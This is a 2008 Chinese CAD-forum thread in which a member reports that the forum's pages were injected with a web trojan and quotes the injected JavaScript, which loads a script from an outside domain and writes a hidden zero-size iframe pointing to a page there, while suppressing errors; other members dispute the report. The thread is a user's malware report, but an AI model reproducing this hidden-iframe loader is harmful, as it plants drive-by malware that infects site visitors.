QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

查看: 2120|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script> 5 m3 n) L5 w& Z8 m, f

  2. . Q: D; c) S' m  n- e2 O" h
  3. document.writeln("<script>";
    & e* C$ v7 V5 P* V
  4. document.writeln("function oK_Begin(){";5 y0 p7 Z0 B9 w( U& D  v2 C
  5. document.writeln("var Then = new Date() ";
    3 n* d5 f% y" d
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
    # F7 d. g) I2 S- s# @: k
  7. document.writeln("var cookieString = new String(document.cookie)";
    0 m; M5 P) r( Q7 A4 q# F
  8. document.writeln("var cookieHeader = "Cookie1=" ";
    ! L  B( Q& M: {" G
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
    " }( e5 W  Y1 }  @
  10. document.writeln("if (beginPosition != -1){ ";
    + Z/ l6 A; i" s6 i
  11. document.writeln("} else ";
    6 y2 l* ^6 c5 C
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    : I9 z; \) m" @  W
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";0 F* s5 w- Q# Y" ?: K
  14. document.writeln("}";
    8 [( B. l! b0 h. a' i/ z! |
  15. document.writeln("}";
    9 g# ~6 t1 V3 V  l
  16. document.writeln("oK_Begin();";* Q' E8 A8 j$ V; w, _$ {; i# a
  17. document.writeln("<\/script>";5 E$ u; N; t* T; Z: X) M
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    2 [& R5 Y" N5 B+ z; q
  19.   X" o! q, H9 u6 m  d# {/ r

  20. % W0 b; b: L9 T. k% B/ X
  21. . w" t4 [" i, F* n# Q
  22. * ]# Z3 t$ |# y) d! t
  23. ( b! ^% ?; O2 P
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.
' S' Y3 F4 Z( P只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.- k# p( n0 x& f! I6 p; {4 `4 s
不过,已经被清理了.
% v- a. H+ ]: G4 ?5 K7 k- b: l0 \2 Z8 c8 m0 a& p8 N1 E+ d
HEHE! i. O& N, D1 k3 k& n  A8 L8 g
8 j5 C& K4 T: J3 b( Q
[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?
* ]5 g6 r# N) K+ m* I
& Y$ Y* L* D6 A9 S5 Rht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js
: S& A) J; M$ b" B此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
3 {; J  e; L! G' l; }这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
3 J5 r9 F% X3 s3 f- CHEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.( R4 ~3 @3 c( k& C& S& d
红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.
/ t" J4 ~1 A& ^/ R, p6 kHEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:
- c4 Y! I) D2 i9 s; Xhttp://www.3dportal.cn/discuz/ 之原1 L& H* H$ H# T  |& V$ F6 C
似乎看不见楼主所说的 http://u.cruze3.cn/u.js4 d* g, z0 x, c$ W9 X- V( c) k, R
7 a# V. j5 L. \% T3 c
[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!
8 g( t  A: {) I/ H) P
* k5 F4 m" k  D+ }1 V) J请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
9 v2 H% x$ ]% M$ N! u6 ]2 P3 a我也说了:已修复。4 m- ?% Z0 E/ O  U% O9 i

( d$ [6 n( N8 @$ j8 wps:这与缓存毫无关系。虽然缓存中有U.JS.
! k" ^; w# s& h! }但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?
1 p0 F. b9 h$ C- g+ Z( y2 J1 A! ~6 A6 z0 t" E2 f
script是个JAVA代码,与U盘何关?4 |( Q5 d' `1 N' ~% c$ {6 q

0 R; F0 B! p) H* h, L/ u' M0 x9 AHEHE
# W: C$ R7 K+ D4 Q6 d) ]
) _# \3 l8 P, S# G6 [. m9 \) l[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!
  y/ l# z) x& ]6 X. k
2 i  L6 |$ o9 s7 F+ s如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。7 F% P2 b& s* a$ @$ r' E

+ d8 m5 I, u0 {  W相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表